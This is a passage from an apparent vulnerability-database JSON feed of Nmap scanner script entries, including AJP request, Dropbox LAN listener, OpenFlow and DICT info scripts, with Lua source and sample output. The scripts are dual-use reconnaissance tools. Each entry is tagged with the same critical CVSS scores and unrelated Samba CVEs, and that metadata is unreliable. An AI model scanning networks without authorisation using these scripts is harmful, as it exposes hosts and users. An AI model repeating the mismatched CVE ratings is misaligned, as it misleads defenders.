(\"%.2f\"):format(rtt), label, (\"%s,%s\"):format(\"- \", \"- \"))\n end\n else\n table.insert(output_structured, { hop = count })\n tab.addrow(output, count, \"...\")\n end\nend\n\naction = function(host)\n tab.addrow(output, \"HOP\", \"RTT\", \"ADDRESS\", \"GEOLOCATION\")\n for count = 1, #host.traceroute do\n local hop = host.traceroute[count]\n -- avoid timedout hops, marked as empty entries\n -- do not add the current scanned host.ip\n if hop.ip then\n local rtt = tonumber(hop.srtt) * 1000\n local geo\n if not ipOps.isPrivate(hop.ip) then\n -- be sure not to cache 
the target address, since it's not likely to be\n -- a hop for something else.\n geo = geoLookup(hop.ip, ipOps.compare_ip(hop.ip, \"eq\", host.ip) )\n end\n output_hop(count, hop.ip, hop.name, rtt, geo)\n else\n output_hop(count)\n end\n end\n\n if (#output_structured > 0) then\n output = tab.dump(output)\n if ( arg_kmlfile ) then\n if ( not(createKMLFile(arg_kmlfile, coordinates)) ) then\n output = output .. (\"\\n\\nERROR: Failed to write KML to file: %s\"):format(arg_kmlfile)\n end\n end\n return output_structured, stdnse.format_output(true, output)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:34", "description": "Requests a URI over the Apache JServ Protocol and displays the result (or stores it in a file). Different AJP methods such as; GET, HEAD, TRACE, PUT or DELETE may be used. \n\nThe Apache JServ Protocol is commonly used by web servers to communicate with back-end Java application server containers.\n\n## Script Arguments \n\n#### username \n\nthe username to use to access protected resources\n\n#### path \n\nthe path part of the URI to request\n\n#### filename \n\nthe name of the file where the results should be stored\n\n#### password \n\nthe password to use to access protected resources\n\n#### method \n\nAJP method to be used when requesting the URI (default: GET)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 8009 <ip> --script ajp-request\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 8009/tcp open ajp13\n | ajp-request:\n | <!DOCTYPE HTML>\n | <html>\n | <head>\n | <title>JSP Test</title>\n |\n | </head>\n | <body>\n | <h2>Hello, World.</h2>\n | Fri May 04 02:09:40 UTC 2012\n | </body>\n |_</html>\n \n\n## Requires \n\n * [ajp](<../lib/ajp.html>)\n * [io](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-14T21:30:24", "type": "nmap", "title": "ajp-request NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:AJP-REQUEST.NSE", "href": "https://nmap.org/nsedoc/scripts/ajp-request.html", "sourceData": "local ajp = require \"ajp\"\nlocal io = require \"io\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRequests a URI over the Apache JServ Protocol and displays the result\n(or stores it in a file). 
Different AJP methods such as; GET, HEAD,\nTRACE, PUT or DELETE may be used.\n\nThe Apache JServ Protocol is commonly used by web servers to communicate with\nback-end Java application server containers.\n]]\n\n---\n-- @usage\n-- nmap -p 8009 <ip> --script ajp-request\n--\n-- @output\n-- PORT STATE SERVICE\n-- 8009/tcp open ajp13\n-- | ajp-request:\n-- | <!DOCTYPE HTML>\n-- | <html>\n-- | <head>\n-- | <title>JSP Test</title>\n-- |\n-- | </head>\n-- | <body>\n-- | <h2>Hello, World.</h2>\n-- | Fri May 04 02:09:40 UTC 2012\n-- | </body>\n-- |_</html>\n--\n-- @args method AJP method to be used when requesting the URI (default: GET)\n-- @args path the path part of the URI to request\n-- @args filename the name of the file where the results should be stored\n-- @args username the username to use to access protected resources\n-- @args password the password to use to access protected resources\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(8009, 'ajp13', 'tcp')\n\nlocal arg_method = stdnse.get_script_args(SCRIPT_NAME .. \".method\") or \"GET\"\nlocal arg_path = stdnse.get_script_args(SCRIPT_NAME .. \".path\") or \"/\"\nlocal arg_file = stdnse.get_script_args(SCRIPT_NAME .. \".filename\")\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. 
\".password\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local helper = ajp.Helper:new(host, port)\n if ( not(helper:connect()) ) then\n return fail(\"Failed to connect to AJP server\")\n end\n\n local valid_methods = {\n [\"GET\"] = true,\n [\"HEAD\"] = true,\n [\"TRACE\"] = true,\n [\"PUT\"] = true,\n [\"DELETE\"] = true,\n [\"OPTIONS\"]= true,\n }\n\n local method = arg_method:upper()\n if ( not(valid_methods[method]) ) then\n return fail((\"Method not supported: %s\"):format(arg_method))\n end\n\n local options = { auth = { username = arg_username, password = arg_password } }\n local status, response = helper:request(arg_method, arg_path, nil, nil, options)\n if ( not(status) ) then\n return fail(\"Failed to retrieve response for request\")\n end\n helper:close()\n\n if ( response ) then\n local output = response.status_line .. \"\\n\" ..\n table.concat(response.rawheaders, \"\\n\") ..\n (response.body and \"\\n\\n\" .. response.body or \"\")\n if ( arg_file ) then\n local f = io.open(arg_file, \"w\")\n if ( not(f) ) then\n return fail((\"Failed to open file %s for writing\"):format(arg_file))\n end\n f:write(output)\n f:close()\n return (\"Response was written to file: %s\"):format(arg_file)\n else\n return \"\\n\" .. output\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:06", "description": "Listens for the LAN sync information broadcasts that the Dropbox.com client broadcasts every 20 seconds, then prints all the discovered client IP addresses, port numbers, version numbers, display names, and more. \n\nIf the `newtargets` script argument is given, all discovered Dropbox clients will be added to the Nmap target list rather than just listed in the output.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script=broadcast-dropbox-listener\n nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn\n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-dropbox-listener:\n | displayname ip port version host_int namespaces\n |_noob 192.168.0.110 17500 1.8 34176083 26135075\n \n Pre-scan script results:\n | broadcast-dropbox-listener:\n | displayname ip port version host_int namespaces\n |_noob 192.168.0.110 17500 1.8 34176083 26135075\n Nmap scan report for 192.168.0.110\n Host is up (0.00073s latency).\n Not shown: 997 filtered ports\n PORT STATE SERVICE\n 139/tcp open netbios-ssn\n 445/tcp open microsoft-ds\n 1047/tcp open neod1\n\n## Requires \n\n * [json](<../lib/json.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [target](<../lib/target.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-01-13T07:17:59", "type": "nmap", "title": "broadcast-dropbox-listener NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": 
"2018-10-18T01:08:19", "id": "NMAP:BROADCAST-DROPBOX-LISTENER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-dropbox-listener.html", "sourceData": "local json = require \"json\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal target = require \"target\"\nlocal table = require \"table\"\n\ndescription = [[\nListens for the LAN sync information broadcasts that the Dropbox.com client\nbroadcasts every 20 seconds, then prints all the discovered client IP\naddresses, port numbers, version numbers, display names, and more.\n\nIf the <code>newtargets</code> script argument is given, all discovered Dropbox\nclients will be added to the Nmap target list rather than just listed in the\noutput.\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-dropbox-listener\n-- nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn\n-- @output\n-- Pre-scan script results:\n-- | broadcast-dropbox-listener:\n-- | displayname ip port version host_int namespaces\n-- |_noob 192.168.0.110 17500 1.8 34176083 26135075\n--\n-- Pre-scan script results:\n-- | broadcast-dropbox-listener:\n-- | displayname ip port version host_int namespaces\n-- |_noob 192.168.0.110 17500 1.8 34176083 26135075\n-- Nmap scan report for 192.168.0.110\n-- Host is up (0.00073s latency).\n-- Not shown: 997 filtered ports\n-- PORT STATE SERVICE\n-- 139/tcp open netbios-ssn\n-- 445/tcp open microsoft-ds\n-- 1047/tcp open neod1\n\nauthor = {\"Ron Bowes\", \"Mak Kolybabi\", \"Andrew Orr\", \"Russ Tait Milne\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nlocal DROPBOX_BROADCAST_PERIOD = 20\nlocal DROPBOX_PORT = 17500\n\nprerule = function()\n return true\nend\n\naction = function()\n -- Start listening for broadcasts.\n local sock = nmap.new_socket(\"udp\")\n sock:set_timeout(2 * DROPBOX_BROADCAST_PERIOD * 1000)\n local status, result = sock:bind(nil, DROPBOX_PORT)\n if not status 
then\n stdnse.debug1(\"Could not bind on port %d: %s\", DROPBOX_PORT, result)\n sock:close()\n return\n end\n\n -- Keep track of the IDs we've already seen.\n local ids = {}\n\n -- Initialize the output table.\n local results = tab.new(6)\n tab.addrow(\n results,\n 'displayname',\n 'ip',\n 'port',\n 'version',\n 'host_int',\n 'namespaces'\n )\n\n local status, result = sock:receive()\n while status do\n -- Parse JSON.\n local status, info = json.parse(result)\n if status then\n -- Get IP address of broadcasting host.\n local status, _, _, ip, _ = sock:get_info()\n if not status then\n stdnse.debug1(\"Failed to get socket info.\")\n break\n end\n stdnse.debug1(\"Received broadcast from host %s (%s).\", info.displayname, ip)\n\n -- Check if we've already seen this ID.\n if ids[info.host_int] then\n -- We can stop now, since we've seen the same ID twice\n -- If ever a host sends a broadcast twice in a row, this will\n -- artificially stop the listener. I can't think of a workaround\n -- for now, so this will have to do.\n break\n end\n ids[info.host_int] = true\n\n -- Add host scan list.\n if target.ALLOW_NEW_TARGETS then\n target.add(ip)\n end\n\n -- Add host to list.\n for _, key1 in pairs({\"namespaces\", \"version\"}) do\n for key2, val in pairs(info[key1]) do\n info[key1][key2] = tostring(info[key1][key2])\n end\n end\n tab.addrow(\n results,\n info.displayname,\n ip,\n info.port,\n table.concat(info.version, \".\"),\n info.host_int,\n table.concat(info.namespaces, \", \")\n )\n\n stdnse.debug1(\"Added host %s.\", info.displayname)\n end\n\n status, result = sock:receive()\n end\n\n sock:close()\n\n -- If no broadcasts received, don't output anything.\n if not next(ids) then\n return\n end\n\n -- Format table, without trailing newline.\n results = tab.dump(results)\n results = results:sub(1, #results - 1)\n\n return \"\\n\" .. 
results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:21", "description": "Queries OpenFlow controllers for information. Newer versions of the OpenFlow protocol (1.3 and greater) will return a list of all protocol versions supported by the controller. Versions prior to 1.3 only return their own version number. \n\nFor additional information: \n\n * <https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf>\n\n## Example Usage \n \n \n nmap -p 6633,6653 --script openflow-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 6653/tcp open openflow\n | openflow-info:\n | OpenFlow Running Version: 1.5.X\n | OpenFlow Versions Supported:\n | 1.0\n | 1.1\n | 1.2\n | 1.3.X\n | 1.4.X\n |_ 1.5.X\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [match](<../lib/match.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-19T17:13:23", "type": "nmap", "title": "openflow-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-19T17:13:23", "id": "NMAP:OPENFLOW-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/openflow-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal match = require \"match\"\nlocal table = require \"table\"\n\ndescription = [[\nQueries OpenFlow controllers for information. Newer versions of the OpenFlow\nprotocol (1.3 and greater) will return a list of all protocol versions supported\nby the controller. Versions prior to 1.3 only return their own version number.\n\nFor additional information:\n* https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf\n]]\n\n---\n-- @usage nmap -p 6633,6653 --script openflow-info <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 6653/tcp open openflow\n-- | openflow-info:\n-- | OpenFlow Running Version: 1.5.X\n-- | OpenFlow Versions Supported:\n-- | 1.0\n-- | 1.1\n-- | 1.2\n-- | 1.3.X\n-- | 1.4.X\n-- |_ 1.5.X\n\nauthor = {\"Jay Smith\", \"Mak Kolybabi <mak@kolybabi.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\"}\n\n-- OpenFlow versions released:\n-- 0x01 = 1.0\n-- 0x02 = 1.1\n-- 0x03 = 1.2\n-- 0x04 = 1.3.X\n-- 0x05 = 1.4.X\n-- 0x06 = 1.5.X\n-- The bits in the version bitmap are indexed by the ofp version number of the\n-- protocol. 
If the bit identified by the number of left bitshift equal\n-- to a ofp version number is set, this OpenFlow version is supported.\nlocal openflow_versions = {\n [0x02] = \"1.0\",\n [0x04] = \"1.1\",\n [0x08] = \"1.2\",\n [0x10] = \"1.3.X\",\n [0x20] = \"1.4.X\",\n [0x40] = \"1.5.X\"\n}\n\nlocal OPENFLOW_HEADER_SIZE = 8\nlocal OFPT_HELLO = 0\nlocal OFPHET_VERSIONBITMAP = 1\n\nportrule = shortport.version_port_or_service({6633, 6653}, \"openflow\", \"tcp\")\n\nreceive_message = function(host, port)\n local hello = string.pack(\n \">I1 I1 I2 I4\",\n 0x04,\n OFPT_HELLO,\n OPENFLOW_HEADER_SIZE,\n 0xFFFFFFFF\n )\n\n -- Handshake Info:\n -- Versions 1.3.1 and later say hello with a bitmap of versions supported\n -- Earlier versions either say hello without the bitmap.\n -- Some implementations are shy and don't make the first move, so we'll say\n -- hello first. We'll pretend to be a switch using version 1.0 of the protocol\n local socket, response = comm.tryssl(host, port, hello, {bytes = OPENFLOW_HEADER_SIZE})\n if not socket then\n stdnse.debug1(\"Failed to connect to service: %s\", response)\n return\n end\n\n if #response < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Initial packet received was %d bytes, need >= %d bytes.\", #response, OPENFLOW_HEADER_SIZE)\n return\n end\n\n -- The first byte is the protocol version number being used. 
So long as that\n -- number is less than the currently-published versions, then we can be\n -- confident in our parsing of the packet.\n local pos = 1\n local message = {}\n local message_version, pos = string.unpack(\">I1\", response, 1)\n if message_version > 0x06 then\n socket:close()\n stdnse.debug1(\"Initial packet received had unrecognized version %d.\", message_version)\n return\n end\n message.version = message_version\n\n -- The second byte is the packet type.\n local message_type, pos = string.unpack(\">I1\", response, pos)\n message.type = message_type\n\n -- The fourth and fifth bytes are the length of the entire message, including\n -- the header and length itself.\n local message_length, pos = string.unpack(\">I2\", response, pos)\n if message_length < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Response declares length as %d bytes, need >= %d bytes.\", message_length, OPENFLOW_HEADER_SIZE)\n return\n end\n message.length = message_length\n\n -- The remainder of the header contains the ID.\n local message_id, pos = string.unpack(\">I4\", response, pos)\n message.id = message_id\n\n -- All remaining data from the response, up until the message length, is the body.\n assert(pos == OPENFLOW_HEADER_SIZE + 1)\n message.body = response:sub(pos, message_length)\n\n -- If we have the whole packet, pass it up the call stack.\n if message_length <= #response then\n socket:close()\n return message\n end\n\n -- If message length is larger than the data we already have, receive the\n -- remainder of the packet.\n local missing_bytes = message_length - #response\n local status, body = socket:receive_buf(match.numbytes(missing_bytes), true)\n if not status then\n socket:close()\n stdnse.debug1(\"Failed to receive missing %d bytes of response: %s\", missing_bytes, body)\n return\n end\n message.body = (response .. 
body):sub(pos, message_length)\n\n return message\nend\n\nretrieve_version_bitmap = function(message)\n -- HELLO message structure:\n -- /* OFPT_HELLO. This message includes zero or more hello elements having\n -- * variable size. Unknown elements types must be ignored/skipped, to allow\n -- * for future extensions. */\n -- struct ofp_hello {\n -- struct ofp_header header;\n -- /* Hello element list */\n -- struct ofp_hello_elem_header elements[0]; /* List of elements - 0 or more */\n -- };\n -- The HELLO message may contain zero or more hello elements. One of these\n -- hello elements may be of the type OFPHET_VERSIONBITMAP. We must search\n -- through elements until we find OFPHET_VERSIONBITMAP.\n -- Note: As of version 1.5, OFPHET_VERSIONBITMAP is the only standard hello element type.\n -- However, we can not assume that this will be the case for long.\n local pos = 1\n local body = message.body\n while pos + 4 < #body - 1 do\n local element_length, element_type\n element_type, element_length, pos = string.unpack(\">I2 I2\", body, pos)\n if pos + element_length < #body then\n stdnse.debug1(\"Ran out of data parsing element type %d at position %d.\", element_type, pos)\n return\n end\n\n if element_type == OFPHET_VERSIONBITMAP then\n return string.unpack(\">I4\", body, pos)\n end\n\n pos = pos + element_length - 4\n end\n\n return\nend\n\naction = function(host, port)\n local output = stdnse.output_table()\n\n local message = receive_message(host, port)\n if not message then\n return\n end\n\n output[\"OpenFlow Version Running\"] = openflow_versions[2 ^ message.version]\n if message.type ~= OFPT_HELLO then\n return output\n end\n\n local version_bitmap = retrieve_version_bitmap(message)\n if not version_bitmap then\n return output\n end\n\n local supported_versions = {}\n for mask, version in pairs(openflow_versions) do\n if mask & version_bitmap then\n table.insert(supported_versions, version)\n end\n end\n table.sort(supported_versions)\n output[\"OpenFlow 
Versions Supported\"] = supported_versions\n\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:04", "description": "Connects to a dictionary server using the DICT protocol, runs the SHOW SERVER command, and displays the result. The DICT protocol is defined in RFC 2229 and is a protocol which allows a client to query a dictionary server for definitions from a set of natural language dictionary databases. \n\nThe SHOW server command must be implemented and depending on access will show server information and accessible databases. If authentication is required, the list of databases will not be shown.\n\n## Example Usage \n \n \n nmap -p 2628 <ip> --script dict-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 2628/tcp open dict\n | dict-info:\n | dictd 1.12.0/rf on Linux 3.0.0-12-generic\n | On ubu1110: up 15.000, 4 forks (960.0/hour)\n |\n | Database Headwords Index Data Uncompressed\n | bouvier 6797 128 kB 2338 kB 6185 kB\n |_ fd-eng-swe 5489 76 kB 77 kB 204 kB\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-14T21:37:39", "type": "nmap", "title": "dict-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DICT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/dict-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a dictionary server using the DICT protocol, runs the SHOW\nSERVER command, and displays the result. The DICT protocol is defined in RFC\n2229 and is a protocol which allows a client to query a dictionary server for\ndefinitions from a set of natural language dictionary databases.\n\nThe SHOW server command must be implemented and depending on access will show\nserver information and accessible databases. 
If authentication is required, the\nlist of databases will not be shown.\n]]\n\n---\n-- @usage\n-- nmap -p 2628 <ip> --script dict-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 2628/tcp open dict\n-- | dict-info:\n-- | dictd 1.12.0/rf on Linux 3.0.0-12-generic\n-- | On ubu1110: up 15.000, 4 forks (960.0/hour)\n-- |\n-- | Database Headwords Index Data Uncompressed\n-- | bouvier 6797 128 kB 2338 kB 6185 kB\n-- |_ fd-eng-swe 5489 76 kB 77 kB 204 kB\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(2628, \"dict\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n local socket = nmap.new_socket()\n if ( not(socket:connect(host, port)) ) then\n return fail(\"Failed to connect to dictd server\")\n end\n\n local probes = {\n 'client \"dict 1.12.0/rf on Linux 3.0.0-12-generic\"',\n 'show server',\n 'quit',\n }\n\n if ( not(socket:send(table.concat(probes, \"\\r\\n\") .. 
\"\\r\\n\")) ) then\n return fail(\"Failed to send request to server\")\n end\n\n local srvinfo\n\n repeat\n local status, data = socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( not(status) ) then\n return fail(\"Failed to read response from server\")\n elseif ( data:match(\"^5\") ) then\n return fail(data)\n elseif ( data:match(\"^114\") ) then\n srvinfo = {}\n elseif ( srvinfo and not(data:match(\"^%.$\")) ) then\n table.insert(srvinfo, data)\n end\n until(not(status) or data:match(\"^221\") or data:match(\"^%.$\"))\n socket:close()\n\n -- if last item is an empty string remove it, to avoid trailing line feed\n srvinfo[#srvinfo] = ( srvinfo[#srvinfo] ~= \"\" and srvinfo[#srvinfo] or nil )\n\n return stdnse.format_output(true, srvinfo)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:43", "description": "Exploits the Max-Forwards HTTP header to detect the presence of reverse proxies. \n\nThe script works by sending HTTP requests with values of the Max-Forwards HTTP header varying from 0 to 2 and checking for any anomalies in certain response values such as the status code, Server, Content-Type and Content-Length HTTP headers and body values such as the HTML title. \n\nBased on the work of: \n\n * Nicolas Gregoire (nicolas.gregoire@agarri.fr) \n * Julien Cayssol (tools@aqwz.com) \n\nFor more information, see: \n\n * <http://www.agarri.fr/kom/archives/2011/11/12/traceroute-like_http_scanner/index.html>\n\n## Script Arguments \n\n#### http-traceroute.path \n\nThe path to send requests to. Defaults to `/`.\n\n#### http-traceroute.method \n\nHTTP request method to use. Defaults to `GET`. Among other values, TRACE is probably the most interesting.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. 
\n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=http-traceroute <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-traceroute:\n | HTML title\n | Hop #1: Twitter / Over capacity\n | Hop #2: t.co / Twitter\n | Hop #3: t.co / Twitter\n | Status Code\n | Hop #1: 502\n | Hop #2: 200\n | Hop #3: 200\n | server\n | Hop #1: Apache\n | Hop #2: hi\n | Hop #3: hi\n | content-type\n | Hop #1: text/html; charset=UTF-8\n | Hop #2: text/html; charset=utf-8\n | Hop #3: text/html; charset=utf-8\n | content-length\n | Hop #1: 4833\n | Hop #2: 3280\n | Hop #3: 3280\n | last-modified\n | Hop #1: Thu, 05 Apr 2012 00:19:40 GMT\n | Hop #2\n |_ Hop #3\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-20T15:42:33", "type": "nmap", "title": "http-traceroute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
